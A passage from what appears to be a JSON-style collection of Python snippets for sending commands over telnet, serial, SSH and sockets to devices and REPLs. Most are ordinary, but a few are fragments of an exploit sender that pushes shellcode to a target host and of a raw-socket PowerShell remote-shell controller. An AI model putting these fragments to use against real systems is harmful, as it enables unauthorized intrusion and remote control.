mgmtip))\n\n exit(call([\"telnet\", mgmtip]))\n else:\n click.secho(\"Node {} does not have an external management IP\".format(node_obj.label))\n else:\n click.secho(\"Node {} is not active\".format(node_obj.label), fg=\"yellow\")\n else:\n click.secho(\"Unable to find lab {}\".format(current_lab), fg=\"red\")\n exit(1)\n else:\n click.secho(\"No current lab set\", fg=\"red\")\n exit(1)", "def issue(self, cmd):\n self.send([cmd])\n return self.read_until_prompt()[1:] # drop the echo", "def run_cmd(server, client):\n msg = [client.get_command()]\n client.input_list += msg\n server.logger.info(\"RECEIVED INPUT {} : {}\".format(client.ip, msg[0]))\n if not client.username or not client.password:\n server.login_screen(client, msg)\n return\n loop_cmds(server, client, msg[0].split(';'))\n server.return_prompt(client)", "def cmd(self, command, timeout = 60):\n retstr = \"\"\n\t#log.debug(\"%s\"%command)\n\tlog.cmd(command)\n try:\n\t self.ses.delaybeforesend = 0.5\n self.ses.sendline(command)\n self.ses.expect(ixia_prompt_regex, timeout)\n\t #log.info(\"before %s; after %s\" %(self.ses.before, self.ses.after))\n retstr += self.ses.before\n except TIMEOUT:\n misc.TestError(\"Timeout in Ixia.cmd for command %s\\n\" % command)\n return retstr.strip().splitlines()[-1]", "def handle_telnet_cmd(self, telnet_cmd):\n print(\"Telnet cmd: {}\".format(telnet_cmd))\n # termious hack\n if self.termious is None:\n if len(telnet_cmd) == 8:\n if telnet_cmd[0] == 250 and telnet_cmd[1] == 31:\n self.termious = True\n if len(telnet_cmd) == 2:\n if telnet_cmd[0] == 251 and telnet_cmd[1] == 31:\n self.termious = False", "def do_cmd(cmd,sock):\n\n buffer = ''\n \n # Write the command and wait one second.\n print 'writing command '+cmd \n sock.send(cmd+SBE37_NEWLINE)\n time.sleep(1)\n \n # Block to receive all data.\n # Continue reading if the received data does not include a prompt.\n # Break out when the received data ends in a prompt.\n while True:\n try:\n data = ''\n data = sock.recv(1024)\n buffer += data\n except:\n raise\n else:\n #print 'received '+str(len(data))+' bytes' \n if buffer.endswith(SBE37Prompt.COMMAND):\n break\n elif buffer.endswith(SBE37Prompt.AUTOSAMPLE):\n break\n elif buffer.endswith(SBE37Prompt.BAD_COMMAND):\n break\n\n return buffer", "def run_cli(self, command=None):\n if command is None:\n return \"FAILURE\"\n\n conn_expect = self.get_expect_connection()\n expect = ['bytes*', '>']\n response = conn_expect.request(\"read_until_prompt\",\n command,\n expect,\n None)\n if response is 'FAILURE':\n return 'FAILURE'\n\n return response", "def do_command(command):\n send_command(command)\n # time.sleep(0.1) # may be required on slow machines\n response = get_response()\n print(\"Rcvd: <<< \" + response)\n return response", "def do(self, command):\r\n command += xsct_line_end\r\n logger.info('Sending command: %s ...', repr(command))\r\n self.send(command)\r\n ans = self.recv()\r\n if ans.startswith('okay'):\r\n return ans[5:]\r\n if ans.startswith('error'):\r\n raise PyXilException(ans[6:])\r\n raise PyXilException('Illegal start-string in protocol. Answer is: ' + ans)", "def send_telnet_command(self, cmd):\n data = bytes(cmd)\n self.send_to_client(data)", "def get_command():\n tcflush(sys.stdin, TCIFLUSH)\n command = input(\"\\nEnter a command\\n>>> \")\n return command", "async def terminal(event):\r\n command = utils.raw(event.message)\r\n await event.edit(f\"**Running command:**\\n`{command}`\")\r\n result = subprocess.getoutput(command)\r\n await event.edit(f\"**Running command:**\\n`{command}`\\n**Result:**\\n`{result}`\")", "async def _run_command(self, cmd, timeout=None, prompt_re=None):\n if not self._connected:\n raise RuntimeError(\n \"Not Connected\", \"status: %r\" % self.exit_status, self.key\n )\n\n # Ideally there should be no data on the stream. We will in any case\n # drain any stale data. This is mostly for debugging and making sure\n # that we are in sane state\n stale_data = await self._stream_reader.drain()\n if len(stale_data) != 0:\n self.logger.warning(\"Stale data on session: %s\", stale_data)\n\n output = []\n\n commands = cmd.splitlines()\n for command in commands:\n cmdinfo = self._devinfo.get_command_info(\n command, self._opts.get(\"command_prompts\")\n )\n\n self.logger.info(\"RUN: %r\", cmdinfo.cmd)\n\n # Send any precmd data (e.g. \\x15 to clear the commandline)\n if cmdinfo.precmd:\n self._stream_writer.write(cmdinfo.precmd)\n\n self._stream_writer.write(cmdinfo.cmd)\n\n try:\n prompt = prompt_re or cmdinfo.prompt_re\n\n resp = await asyncio.wait_for(\n self._wait_response(command, prompt),\n timeout or self._devinfo.vendor_data.cmd_timeout_sec,\n loop=self._loop,\n )\n output.append(self._format_output(command, resp))\n except asyncio.TimeoutError:\n self.logger.error(\"Timeout waiting for command response\")\n data = await self._stream_reader.drain()\n raise RuntimeError(\"Command Response Timeout\", data[-200:])\n\n return b\"\\n\".join(output).rstrip()", "def query(self, *parameters):\n telnet = telnetlib.Telnet(self.host, self.port)\n if self._username and self._password:\n telnet.write('login {username} {password}\\n'.format(\n username=self._username,\n password=self._password).encode('UTF-8'))\n telnet.read_until(b'\\n', timeout=3)\n message = '{}\\n'.format(' '.join(parameters))\n telnet.write(message.encode('UTF-8'))\n response = telnet.read_until(b'\\n', timeout=3)\\\n .decode('UTF-8')\\\n .split(' ')[-1]\\\n .strip()\n telnet.write(b'exit\\n')\n return urllib.parse.unquote(response)", "def query(self, command):\r\n self.ser_io.write(command+'\\r')\r\n return self.ser_io.readline()", "def telnet(self):\n self.log.info(\"connect-via-telnet\")\n telnet = distutils.spawn.find_executable(\"telnet\")\n os.execv(telnet, (\"telnet\", \"localhost\", str(self.qemu.monitor_port)))", "def connect(host: str, port: int):\n print('Connecting to the server...')\n print(cmd.RESP_OK, type(cmd.RESP_OK))\n tn = telnetlib.Telnet(host = host, port = port)\n code, params = cmd.serv_read_resp(tn)\n if code != cmd.RESP_OK:\n print(f'Connection problem. {code, params}')\n exit(0)\n print(f'{params[0]}\\n')\n return tn", "def run(self, cmd, exp='', timeout=60):\n if not self.connected(): return (False, list())\n\n clist = cmd.split()\n\n # disable paing and echo would simplify parsing\n self.set_paging_status(False)\n self.set_echo_status(False)\n\n # do not allow paging and echo and prompt command\n if clist[0] == 'paging' or clist[0] == 'echo' or clist[0] == 'prompt':\n return (True, list())\n\n\n if not exp:\n # prompt will be inserted by middle commands, so replace with '.*'\n exp = [(self.prompt[:-2] + '.*# ').encode('ascii')]\n\n if not isinstance(exp, list):\n exp = [exp]\n\n # capture this if paging status is enabled by user command unexpectedly\n exp.append(br'more\\? y=\\[yes\\] q=\\[quit\\].*')\n\n try:\n self.write(cmd + '\\n')\n res = list()\n while True:\n resp = self.tn.expect(exp, timeout)\n if resp[0] == -1:\n sys.stderr.write(self.ne + \": \" + cmd + \" no resp\\n\")\n return (False, list())\n elif resp[0] == (len(exp) - 1): # paging\n # remove the the tailline(which is paging indication) \n res += resp[2].decode('ascii').splitlines()[:-1]\n self.write(b'y')\n else:\n res += resp[2].decode('ascii').splitlines()\n break\n except:\n sys.stderr.write(self.ne + \": \" + cmd + \" FAIL\\n\")\n self.close()\n return (False, list())\n\n # remove tailline(which is prompt)\n return (True, list(filter(None, res[:-1])))", "async def interactive_shell():\n # Create Prompt.\n session = PromptSession('Say something: ')\n\n # Run echo loop. Read text from stdin, and reply it back.\n while True:\n try:\n result = await session.prompt(async_=True)\n print('You said: \"{0}\"'.format(result))\n except (EOFError, KeyboardInterrupt):\n return", "async def interactive_shell(self) -> None:\n session = PromptSession()\n while True:\n try:\n result = await session.prompt_async(f\"redCisco> \", style=style)\n if not result:\n continue\n await self.command_interpreter(str(result).strip())\n except (EOFError, KeyboardInterrupt):\n break", "def command(s_socket):\r\n command = raw_input(\"#> \")\r\n bytes_value = to_bytes(len(command) + 5, 4, 'little')\r\n s_socket.send('c' + bytes_value + command)\r\n\r\n print(s_socket.recv(MAX_BUFFER_LENGTH))", "def command(cmd: str) -> str:\n with MCRcon(SERVERADDRESS, PASSWORD) as mcr:\n response = mcr.command(cmd)\n return response", "async def repl(self, ctx):\n variables = {\n 'ctx': ctx,\n 'bot': self.bot,\n 'message': ctx.message,\n 'guild': ctx.guild,\n 'channel': ctx.channel,\n 'author': ctx.author,\n '_': None,\n }\n\n if ctx.channel.id in self.sessions:\n await ctx.send('Already running a REPL session in this channel. Exit it with `quit`.')\n return\n\n self.sessions.add(ctx.channel.id)\n await ctx.send('Enter code to execute or evaluate. `exit()` or `quit` to exit.')\n\n def check(m):\n return m.author.id == ctx.author.id and \\\n m.channel.id == ctx.channel.id and \\\n m.content.startswith('`')\n\n while True:\n try:\n response = await self.bot.wait_for('message', check=check, timeout=10.0 * 60.0)\n except asyncio.TimeoutError:\n await ctx.send('Exiting REPL session.')\n self.sessions.remove(ctx.channel.id)\n break\n\n cleaned = self.cleanup_code(response.content)\n\n if cleaned in ('quit', 'exit', 'exit()'):\n await ctx.send('Exiting.')\n self.sessions.remove(ctx.channel.id)\n return\n\n executor = exec\n if cleaned.count('\\n') == 0:\n # single statement, potentially 'eval'\n try:\n code = compile(cleaned, '<repl session>', 'eval')\n except SyntaxError:\n pass\n else:\n executor = eval\n\n if executor is exec:\n try:\n code = compile(cleaned, '<repl session>', 'exec')\n except SyntaxError as e:\n await ctx.send(self.get_syntax_error(e))\n continue\n\n variables['message'] = response\n\n fmt = None\n stdout = io.StringIO()\n\n try:\n with contextlib.redirect_stdout(stdout):\n result = executor(code, variables)\n if inspect.isawaitable(result):\n result = await result\n except Exception as e:\n value = stdout.getvalue()\n fmt = f'```py\\n{value}{traceback.format_exc()}\\n```'\n else:\n value = stdout.getvalue()\n if result is not None:\n fmt = f'```py\\n{value}{result}\\n```'\n variables['_'] = result\n elif value:\n fmt = f'```py\\n{value}\\n```'\n\n try:\n if fmt is not None:\n if len(fmt) > 2000:\n await ctx.send('Content too big to be printed.')\n else:\n await ctx.send(fmt)\n except discord.Forbidden:\n pass\n except discord.HTTPException as e:\n await ctx.send(f'Unexpected error: `{e}`')", "def enter_repl(self):\n text_input = ''\n while True:\n text_input = input('>>')\n if text_input == 'exit':\n break\n #An alias for querying an instrument error string\n elif text_input == 'err?':\n self.write_to_serial(':SYST:ERR?')\n print(self.read_from_serial())\n else:\n self.write_to_serial(text_input)\n print(self.read_from_serial())", "def send_command(self, command):\r\n\r\n connection = self.establish_connection()\r\n connection.send(command + '\\n')\r\n print command\r\n output = connection.recv(1000)\r\n return output", "def SendCmdWithKeyWord(self, command, RetKeyword):\r\n if not self.__CheckConnectStatus():\r\n print \"Non telnet connection!\"\r\n return False\r\n\r\n if command == None or command == False:\r\n print \"No valid command to run.\"\r\n return True\r\n else:\r\n command = str(command) + \"\\r\\n\"\r\n print self.prompt + command\r\n \r\n try:\r\n self.tn.read_very_eager()\r\n self.tn.write(command)\r\n p_Output = self.tn.read_until(RetKeyword, self.timeout)\r\n print p_Output\r\n return p_Output\r\n\r\n except:\r\n print \"Write command failure\"\r\n return False", "def run(self, cmd, timeout=30, exitcode=True):\n result = False\n self.write(cmd)\n stdout = self.stdout_read(timeout)\n\n if exitcode:\n self.write(\"echo $?\".format(cmd))\n rc = self.stdout_read(timeout)\n if re.search(r\"\\r\\n0\\r\\n\", rc, re.MULTILINE):\n result = True\n elif stdout is not None and stdout != \"\":\n result = True\n return result, stdout", "def get_response(command):\n connection = get_client()\n\n connection.send(command)\n\n data = connection.recv()\n connection.close()\n\n return data", "def sendCommand(self,command): \r\n \r\n try:\r\n stdin,stdout,stderr=ssh.exec_command(command)\r\n feedback= '*** Command is sent***'\r\n return feedback,stdin,stdout,stderr\r\n except Exception as e :\r\n print '***Command sending failed :'+str(e)+'***'\r\n sys.exit(1)", "def telnet_login(self, **kwargs):\n raise NotImplementedError", "def _send_command(self, command):\n command = \"%s\\n\" % (command.strip())\n self.server.write(command)\n self.server.flush()\n\n #read the length of the result\n length = int(self.server.readline())\n output = self.server.read(length)\n\n result = pickle.loads(output)\n if result[0] == 'ok':\n return result[1]\n else:\n raise RobotCommandError(str(result))", "def send_command(self, data):\n try:\n self.write(data)\n reply = self.read_line()\n \n if reply == \"{}\":\n pass\n else:\n print \"send_command: received bad reply %s\" % (reply)\n sys.exit(1)\n except Exception:\n raise", "def send_cmd(self):\n\n cmd = self.repl_input.get().encode()\n self.serial.write(cmd + b\"\\r\")\n self.repl_input.set(\"\")", "def test_direct_access_telnet_mode(self):\n self.assert_enter_command_mode()\n\n # go into direct access\n self.assert_direct_access_start_telnet(timeout=600)\n self.tcp_client.send_data(\"#D\\r\\n\")\n if not self.tcp_client.expect(\"\\r\\n\"):\n self.fail(\"test_direct_access_telnet_mode: did not get expected response\")\n \n self.assert_direct_access_stop_telnet()", "def __alt_prompt(self, prompt_text: str):\r\n if self.__use_windows_prompt:\r\n sys.stdout.write(prompt_text)\r\n sys.stdout.flush()\r\n i = sys.stdin.readline()\r\n return i.strip()\r\n return input(prompt_text)", "def acceptComm():\r\n\tcommand = input(\"Enter a number: \")\r\n\tif command in COMMANDS:\r\n\t\treturn command\r\n\telse: \r\n\t\tprint(\"ERROR: Command NOT Recognized\")\r\n\t\treturn acceptComm()", "def telnet_console_port(self):\n logging.info('Telnet to console port with ip %s and port %s',self.console_ip, self.act_port)\n console = pexpect.spawn('telnet %s %s' % (self.console_ip, self.act_port))\n console.logfile = self.log\n console.sendline('')\n i = console.expect([pexpect.TIMEOUT, pexpect.EOF, LOGIN_INCORRECT, \\\n 'Abort Auto Provisioning and continue.*', 'enable admin vdc.*', \\\n 'enforce secure password.*', 'the basic configuration dialog.*', \\\n 'the password for.*', LOADER_PROMPT, BOOT_PROMPT, BASH_SHELL, DEBUG_SHELL, \\\n SWITCH_LOGIN, PWD_PROMPT, SWITCH_PROMPT])\n while i >= 0:\n if i == 0:\n console.close()\n logging.info('telnet_console_port, Timed out, Not able to access console')\n raise TimeoutError('telnet_console_port, Timed out, Not able to access console')\n if i == 1:\n console.close()\n logging.info('telnet_console_port, Eof error, Not able to access console')\n raise EofError('telnet_console_port, Eof error, Not able to access console')\n if i == 2:\n console.close()\n logging.info('telnet_console_port, Password error')\n raise PasswordError('telnet_console_port, Password error')\n if i>2 and i<8:\n console.close()\n logging.info(\"telnet_console_port, switch is booting so load and check\")\n raise BootingError(\"telnet_console_port, switch is booting so load and check\")\n if i == 8 or i == 9:\n console.close()\n logging.info('telnet_console_port, Switch in loader/boot prompt')\n raise LoaderError('telnet_console_port, Switch in loader/boot prompt')\n if i == 10 or i == 11:\n console.sendline('exit')\n if i == 12:\n console.sendline('admin')\n if i == 13:\n console.sendline(self.switch_pwd)\n if i == 14:\n break\n i = console.expect([pexpect.TIMEOUT, pexpect.EOF, LOGIN_INCORRECT, \\\n 'Abort Auto Provisioning and continue.*', 'enable admin vdc.*', \\\n 'enforce secure password.*', 'the basic configuration dialog.*', \\\n 'the password for.*', LOADER_PROMPT, BOOT_PROMPT, BASH_SHELL, DEBUG_SHELL, \\\n SWITCH_LOGIN, PWD_PROMPT, SWITCH_PROMPT], 5)\n \n return console", "def cmd(self, cmd, verbose=None, timeout=120, listformat=False):\n \n if verbose is None:\n verbose = self.verbose\n \n cmd = str(cmd)\n t = None #used for timer \n start = time.time()\n output = []\n if verbose:\n self.debug( \"[\" + self.username +\"@\" + str(self.host) + \"]# \" + cmd)\n try:\n tran = self.connection.get_transport()\n chan = tran.open_session()\n chan.get_pty()\n f = chan.makefile()\n t = Timer(timeout, self.ssh_sys_timeout,[chan, start,cmd] )\n t.start()\n chan.exec_command(cmd)\n if ( listformat is True):\n #return output as list of lines\n output = f.readlines()\n else:\n #return output as single string buffer\n output = f.read()\n if verbose:\n self.debug(\"done with exec\")\n except CommandTimeoutException, cte: \n elapsed = str(time.time()-start).split('.')[0]\n self.debug(\"Command (\"+cmd+\") timed out after \" + str(elapsed) + \" seconds\\nException\") \n raise cte\n finally:\n if (t is not None):\n t.cancel() \n if verbose:\n elapsed = str(time.time()-start).split('.')[0]\n if (listformat is True):\n self.debug(\"\".join(output))\n else:\n self.debug(output)\n \n return output", "def exec_raw_no_follow(self, command) -> None:\n\n if isinstance(command, bytes):\n command_bytes = command\n else:\n command_bytes = bytes(command.encode(\"utf-8\"))\n\n # check we have a prompt\n data = self.read_until(1, b\">\")\n if not data.endswith(b\">\"):\n raise PyboardError(\"could not enter raw repl 5\")\n\n if self.use_raw_paste:\n # Try to enter raw-paste mode.\n self.con.write(b\"\\x05A\\x01\")\n data = self.con.read(2)\n if data == b\"R\\x00\":\n # Device understood raw-paste command but doesn't support it.\n pass\n elif data == b\"R\\x01\":\n # Device supports raw-paste mode, write out the command using this mode.\n return self.raw_paste_write(command_bytes)\n else:\n # Device doesn't support raw-paste, fall back to normal raw REPL.\n data = self.read_until(1, b\"w REPL; CTRL-B to exit\\r\\n>\")\n if not data.endswith(b\"w REPL; CTRL-B to exit\\r\\n>\"):\n print(data)\n raise PyboardError(\"could not enter raw repl\")\n # Don't try to use raw-paste mode again for this connection.\n self.use_raw_paste = False\n\n # write string\n debug(f'self.con.write \"{command_bytes}\"')\n self.con.write(command_bytes)\n\n # Alternative for write string above, do it in chuncks of max 256 bytes.\n # Write command using standard raw REPL, 256 bytes every 10ms.\n # for i in range(0, len(command_bytes), 256):\n # self.serial.write(command_bytes[i: min(i + 256, len(command_bytes))])\n # time.sleep(0.01)\n\n # Terminate command\n debug(r'self.con.write \"\\r\\x04\"')\n self.con.write(b\"\\x04\")\n\n # check if we could exec command\n data = self.read_until(2, b\"OK\", timeout=0.5)\n if data != b\"OK\":\n raise PyboardError(\"could not exec command (response: %r)\" % data)", "def shell(s_socket):\r\n shellname = \"powershell\"\r\n bytes_value = to_bytes(len(shellname), 4, 'little')\r\n s_socket.send('o' + bytes_value + shellname)\r\n value = raw_input(shellname + \"#> \")\r\n while True:\r\n bytes_value = to_bytes(len(value), 4, 'little')\r\n s_socket.send('s' + bytes_value + value)\r\n print(s_socket.recv(20000))\r\n\r\n if 'exit' in value:\r\n break\r\n\r\n value = raw_input(shellname + \"#> \")", "def askForCommand(self,command): \n\n\t\tcurrentCommand = 'Simple 2F Gripper Controller\\n-----\\nCurrent command:'\n\t\tcurrentCommand += ' rACT = ' + str(command.rACT)\n\t\tcurrentCommand += ', rGTO = ' + str(command.rGTO)\n\t\tcurrentCommand += ', rATR = ' + str(command.rATR)\n\t\tcurrentCommand += ', rPR = ' + str(command.rPR )\n\t\tcurrentCommand += ', rSP = ' + str(command.rSP )\n\t\tcurrentCommand += ', rFR = ' + str(command.rFR )\n\n\n\t\tprint currentCommand\n\n\t\tstrAskForCommand = '-----\\nAvailable commands\\n\\n'\n\t\tstrAskForCommand += 'r: Reset\\n'\n\t\tstrAskForCommand += 'a: Activate\\n'\n\t\tstrAskForCommand += 'c: Close\\n'\n\t\tstrAskForCommand += 'o: Open\\n'\n\t\tstrAskForCommand += '(0-255): Go to that position\\n'\n\t\tstrAskForCommand += 'f: Faster\\n'\n\t\tstrAskForCommand += 'l: Slower\\n'\n\t\tstrAskForCommand += 'i: Increase force\\n'\n\t\tstrAskForCommand += 'd: Decrease force\\n'\n\t\t\n\t\tstrAskForCommand += '-->'\n\n\t\treturn raw_input(strAskForCommand)\n\t\t#return raw_input(strAskForCommand)", "def run_pty(self, command):\r\n boto.log.debug('running:%s on %s' % (command, self.server.instance_id))\r\n channel = self._ssh_client.get_transport().open_session()\r\n channel.get_pty()\r\n channel.exec_command(command)\r\n return channel.recv(1024)", "def recv_to_prompt(self):\n buf = \"\"\n while True:\n ibuf = self._channel.recv(65536)\n buf += ibuf\n if ibuf.endswith(\"$ \") or ibuf.endswith(\"# \"):\n break\n\n lbuf = buf.splitlines()\n return lbuf[1:-1]", "def sendCmd(self, cmd, timeout=300, ignoreErrors=False,expected_param = \"]#\"):\n self.resetStream()\n\n cmd = cmd.strip()\n cmd = re.sub(r\"[\\r\\n\\t\\s]+\", \" \", cmd)\n try:\n available_data = self._session.read_nonblocking(size=1000, timeout=0.5) # Read all available output\n if re.search(\"logging out\", available_data, flags=re.I):\n logger.info(\"Logged out due to inactivity. Reconnecting..\")\n self.reconnect()\n except pexpect.TIMEOUT: pass\n\n self._session.sendline(cmd)\n\n self.last_output = \"\"\n while True:\n i = self._session.expect([self._prompt, pexpect.EOF, pexpect.TIMEOUT, \"logging out\", self.promptmore,expected_param], timeout=timeout)\n #print \"Value of i \" + str(i)\n if i == 0:\n # Prompt found\n self.last_match = self._session.match\n self.last_output += self._session.before\n break\n if i == 1:\n # EOF\n logger.error(\"Connection closed %s\" % self)\n raise ValueError(\"Connection Closed\")\n elif i == 2:\n # TIMEOUT\n logger.error(str(self._session))\n logger.error(\"Time Out\")\n raise ValueError(\"Time Out\")\n elif i == 3:\n logger.info(\"Logged out due to inactivity. Reconnecting..\")\n self.reconnect()\n self._session.sendline(cmd)\n continue\n elif i == 4:\n # More prompt. Send Space\n self.last_output += self._session.before\n self._session.send(\" \")\n continue\n elif i == 5:\n self.last_output = self._session.before\n break\n\n #logger.debug(\"Output Before Removing command: %s\" % self.last_output)\n #self.last_output = re.sub(\"(?m)\" + re.escape(cmd), \"\", self.last_output)\n #logger.debug(\"Output After Removing command: %s\" % self.last_output)\n\n #if not ignoreErrors and re.search(\"\\b:*(error|unable|failed|failure|unrecognized command):*\\b\", self.last_output, re.I):\n # logger.error(\"Error while executing command\")\n\n if cmd.startswith(\"hadoop\"):\n #logger.debug(\"Before removal: '%s'\" % self.last_output)\n self.last_output = re.sub(r\"(?m)^\\s*WARNING:.*$\", \"\", self.last_output)\n #logger.debug(\"After removal: '%s'\" % self.last_output)\n\n # Remove some special characters seen in new platforms (gingko onwards)\n #logger.debug(\"Output before removing special chars: %s\" % self.last_output)\n ret_val = remove_special(self.last_output)\n\n #logger.debug(\"Output after removing special chars: %s\" % ret_val)\n return ret_val.strip()", "def send_command_and_receive_response(command):\n\n sock = socket.socket(socket.AF_UNIX, socket.SOCK_STREAM)\n sock.connect('/tmp/socket_c_and_nc')\n data = 'No response'\n try:\n msg = command\n sock.sendall(str(len(msg)).zfill(10))\n sock.sendall(msg)\n #sendmsg(sock, str(len(msg)).zfill(10))\n #sendmsg(sock, msg)\n\n length = constants.recvall(sock, 10)\n #length = sock.recv(10)\n #log.debug(str(length))\n data = constants.recvall(sock, int(length))\n \n finally:\n sock.close()\n \n return data", "def reply(self, message):\n [command, argument] = message.split(\"\\n\")\n if command == \"deposit\":\n return self.deposit(argument)\n elif command == \"withdraw\":\n return self.withdraw(argument)\n elif command == \"balance\":\n return self.getBalance()\n elif command == \"logout\":\n return self.logout()\n else:\n return self.login(command, argument)", "def snarf(cmd):\n f=os.popen(cmd)\n result = f.readline()[:-1] # strip final newline\n f.close()\n return result", "async def telnet_send_command_with_unexpected_pattern(\n self, cmd, pattern, error_pattern=None, timeout=None\n ):\n\n # Debug info message\n log.info(\"telnet_send_command_with_unexpected_pattern\")\n\n # Default value of timeout variable\n if timeout is None:\n timeout = self.timeout\n\n # Add carriage return at the end of the command (mandatory to send the command)\n cmd = cmd + self._carriage_return_for_send_command\n\n # Sending command\n self._writer.write(cmd.encode())\n\n # Temporary string variable\n output = \"\"\n\n # Temporary bytes variable\n byte_data = b\"\"\n\n # By default pattern is not found\n pattern_not_found = True\n\n try:\n\n # Read data\n while pattern_not_found:\n\n # Read returned prompt\n byte_data += await asyncio.wait_for(\n self._reader.read(MAX_BUFFER_DATA), timeout=timeout\n )\n\n # Display info message\n log.info(\n f\"telnet_send_command_with_unexpected_pattern: byte_data: '{byte_data}'\"\n )\n\n # Display debug message\n log.debug(\n f\"telnet_send_command_with_unexpected_pattern: byte_data: hex: '{byte_data.hex()}'\"\n )\n\n # Temporary convertion in string. This string has the following form: \"b'....'\"\n output = str(byte_data)\n\n # Display info message\n log.info(\n f\"telnet_send_command_with_unexpected_pattern: output: '{output}'\"\n )\n\n # Is a pattern used?\n if pattern:\n\n # Check all pattern of prompt in the output\n for prompt in pattern:\n\n # Display info message\n log.info(\n f\"telnet_send_command_with_unexpected_pattern: checking prompt: '{prompt}'\"\n )\n\n # A pattern found?\n if prompt in output:\n\n # Yes\n\n # A pattern is found. The main loop can be stopped\n pattern_not_found = False\n\n # Display info message\n log.info(\n f\"telnet_send_command_with_unexpected_pattern: prompt found: '{prompt}'\"\n )\n\n # Leave the loop\n break\n\n # Is an unexpected pattern used?\n if error_pattern and pattern_not_found:\n\n # Check all unexpected pattern of prompt in the output\n for bad_prompt in error_pattern:\n\n # Display info message\n log.info(\n f\"telnet_send_command_with_unexpected_pattern: checking unexpected prompt: '{bad_prompt}'\"\n )\n\n # An error_pattern pattern found?\n if bad_prompt in output:\n\n # Yes\n\n # Display error message\n log.error(\n \"telnet_send_command_with_unexpected_pattern: authentication failed\"\n )\n\n # Raise exception\n raise Exception(\n \"telnet_send_command_with_unexpected_pattern: authentication failed\"\n )\n\n # Leave the loop\n # break\n\n except asyncio.TimeoutError:\n\n # Time out during when reading prompt\n\n # Close the connection in order to not display RuntimeError\n await self.disconnect()\n\n # Display error message\n log.error(\n \"telnet_send_command_with_unexpected_pattern: reading prompt: timeout\"\n )\n\n # Exception propagation\n raise\n\n except Exception as error:\n\n # Error during when reading prompt\n\n # Close the connection in order to not display RuntimeError\n await self.disconnect()\n\n # Display error message\n log.error(\n f\"telnet_send_command_with_unexpected_pattern: reading prompt: error: {error}\"\n )\n\n # Exception propagation\n raise\n\n # Convert data (bytes) into string\n output = byte_data.decode(\"utf-8\", \"ignore\")\n\n # Debug info message\n log.debug(\n f\"telnet_send_command_with_unexpected_pattern: raw output: '{output}'\\ntelnet_send_command_with_unexpected_pattern: raw output (hex): '{output.encode().hex()}'\"\n )\n\n # Remove the command sent from the result of the command\n output = self.remove_command_in_output(output, str(cmd))\n # Remove the carriage return of the output\n output = self.remove_starting_carriage_return_in_output(output)\n # Remove the ending prompt of the output\n output = self.remove_ending_prompt_in_output(output)\n\n # Debug info message\n log.debug(\n f\"telnet_send_command_with_unexpected_pattern: cleaned output: '{output}'\\ntelnet_send_command_with_unexpected_pattern: cleaned output (hex): '{output.encode().hex()}'\"\n )\n\n # Return the result of the command\n return output", "def execute(self, irc_c, msg, cmd):", "def send_recv_session(self, fillin):\n prompts = self.session_params[\"prompts\"]\n timeout = self.session_params[\"timeout\"]\n add_eol = self.session_params[\"add_eol\"]\n func = self.session_params[\"out_func\"]\n\n if fillin is not None:\n self.session.send(fillin.encode(\"utf-8\"))\n if add_eol and not fillin.endswith('\\n'):\n self.session.send(\"\\n\".encode(\"utf-8\"))\n\n buff = ''\n begin = time.perf_counter()\n while True:\n try:\n resp = self.session.recv(9999)\n except socket.timeout:\n resp = b\"\"\n dec = resp.decode(\"unicode_escape\")\n buff += dec\n for p in prompts:\n if buff.endswith(p):\n break\n if time.perf_counter() - begin > timeout:\n break\n\n return func(buff.replace(\"\\r\", \"\"))", "def get_prompt(self, timeout=30):\n #self.tc.expect(self.tool_prompt, timeout=timeout)\n #self.tf = self.tc.after.split()\n #return {'status': int(self.tf[self.tool_status_index]), 'output': self.tc.before}\n output = \"\"\n # Loop until we receive the special spt prompt while in pipe mode.\n while True:\n line = self.tc.stdout.readline()\n if re.search(self.tool_prompt, line):\n self.tf = line.split()\n break\n elif not len(line):\n # We've reached EOF or spt exited abnormally, usually a core dump!\n raise RuntimeError\n else:\n output += line\n #if self._debug:\n # print('Response: {0}'.format(self.tf))\n # print('Output: {0}'.format(output), end=None)\n #import pdb; pdb.set_trace()\n return {'status': int(self.tf[self.tool_status_index]), 'output': output}", "def send_exploit(ip: str, port: int) -> None:\n sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n sock.connect((ip, port))\n sock.settimeout(5)\n sock.send(build_buf(add_shellcode()))\n try:\n print(sock.recv(1024))\n except socket.timeout:\n pass\n finally:\n sock.close()", "def connect(command):\r\n global CurrentState\r\n global CurrentInput\r\n global RESPONSEOPTIONS\r\n stateNum = \"\"\r\n for ltr in command:\r\n if ltr.isnumeric():\r\n stateNum += ltr\r\n try:\r\n target_state = getState(int(stateNum))\r\n if target_state != None:\r\n if RESPONSEOPTIONS != []:\r\n RESPONSEOPTIONS[0] = target_state\r\n else:\r\n RESPONSEOPTIONS.append(target_state)\r\n else:\r\n print(\"Could not find state\")\r\n except Exception as e:\r\n print(\"<<<Error: Connecting state failed>>>\",e)", "def _execute(self, message):\n logging.info(__name__ + ' : Send the following command to the device: %s' % message)\n self.visa_handle.write('@%s%s' % (self._number, message))\n sleep(70e-3) # wait for the device to be able to respond\n result = self._read()\n if result.find('?') >= 0:\n print(\"Error: Command %s not recognized\" % message)\n else:\n return result", "def read():\n print(command(\"R\"))", "def parseCommand(self, msg):\n if msg == \"\":\n return\n if self.interpreter.debug:\n print \"Modem::parseCommand: \", msg\n if(self.status == Modem.Status.KILL):\n return\n command = msg.split(Interpreter.SEPARATOR)\n if (len(command)==1):\n if (command[0] == 'OK'):\n return self.confirmedMyIstr()\n elif (len(command)==2):\n if (command[0] == 'error'):\n return self.error(int(command[1]))\n elif (len(command)==3):\n if (command[0] == 'send_file'):\n cmd2 = re.sub(\"[^0-9]\", \"\", command[2])\n return self.recvDataFile(command[1],int(cmd2),False)\n elif (command[0] == 'send_stream'):\n cmd2 = re.sub(\"[^0-9]\", \"\", command[2])\n return self.recvDataFile(command[1],int(cmd2),False)\n return self.reset_myself()", "def sendCmd(self,cmd):\n self.ser.write(cmd.encode()+END.encode())\n out = self.ser.readline()\n return out", "def show_commands(net_connect, hostname, password, command, data_file):\n # check if in enable mode\n print('\\n' + sep)\n print('==> Sending commands...')\n print(sep)\n # apply the command\n res = net_connect.send_command(command)\n print('\\n' + sep)\n print(res)\n print('\\n' + sep + '\\n')\n # write config to file\n print('\\n' + sep + '\\n')\n print('==> Appending command output data to file...')\n content = '\\n' + sep + '\\n' + hostname + ' : '+ command + '\\n' + sep + '\\n' + res + '\\n' + sep + '\\n'\n append_data_to_file(data_file, content, hostname)\n print('==> Exiting...')", "def login_aashell(self):\n flag = 0\n login_aashell = 